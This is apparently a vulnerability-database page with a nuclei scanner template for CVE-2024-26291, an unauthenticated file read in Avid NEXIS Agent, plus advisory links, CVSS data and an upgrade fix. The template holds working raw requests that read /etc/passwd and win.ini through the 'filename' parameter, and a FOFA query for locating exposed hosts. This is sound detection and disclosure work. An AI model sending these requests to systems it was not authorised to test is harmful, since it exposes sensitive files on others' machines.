Lucene search
K

Avid NEXIS Agent - Arbitrary File Read

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

Avid NEXIS Agent allows arbitrary file read via filename validation; upgrade to 2025.5.1+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-26291
9 Sep 202520:51
circl
CNNVD
Avid多款产品 安全漏洞
14 Jul 202500:00
cnnvd
CVE
CVE-2024-26291
14 Jul 202508:12
cve
Cvelist
CVE-2024-26291 Authenticated Arbitrary File Read affecting Avid NEXIS
14 Jul 202508:12
cvelist
EUVD
EUVD-2024-23562
3 Oct 202520:07
euvd
NVD
CVE-2024-26291
14 Jul 202509:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check
26 Sep 201700:00
openvas
Positive Technologies
PT-2025-29436
14 Jul 202500:00
ptsecurity
RedhatCVE
CVE-2024-26291
16 Jul 202509:00
redhatcve
Vulnrichment
CVE-2024-26291 Authenticated Arbitrary File Read affecting Avid NEXIS
14 Jul 202508:12
vulnrichment
Rows per page
id: CVE-2024-26291

info:
  name: Avid NEXIS Agent - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read sensitive files with highest privileges, potentially exposing critical information.
  remediation: Upgrade to Avid NEXIS version 2025.5.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-26291
    - https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html
    - https://kb.avid.com/pkb/articles/troubleshooting/en239659
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-26291
    epss-score: 0.01083
    epss-percentile: 0.61143
    cwe-id: CWE-285
  metadata:
    verified: true
    max-request: 2
    vendor: avid
    product: nexis
    fofa-query: body="Avid Nexis"
  tags: cve,cve2024,avid,nexis,lfi,file-read,gsoap

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /logs?filename=%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: linux
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
          - 'contains(header, "gSOAP")'
        condition: and

  - raw:
      - |
        GET /logs?filename=C%3A%5CWindows%5Cwin.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: windows
        dsl:
          - 'status_code == 200'
          - 'contains(body, "[fonts]") || contains(body, "[extensions]")'
          - 'contains(header, "gSOAP")'
        condition: and
# digest: 4a0a00473045022100f338a39254d061dc705e50274eb142f0a811d1e07c44332d3385860e6a654e4e02201c4112ca71b200df06ec9fbc33ab91009e3a7df6504eb6b35b36814c17ed5d25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2026 07:45Current
7.3High risk
Vulners AI Score7.3
CVSS 48.7
EPSS0.01083
SSVC
18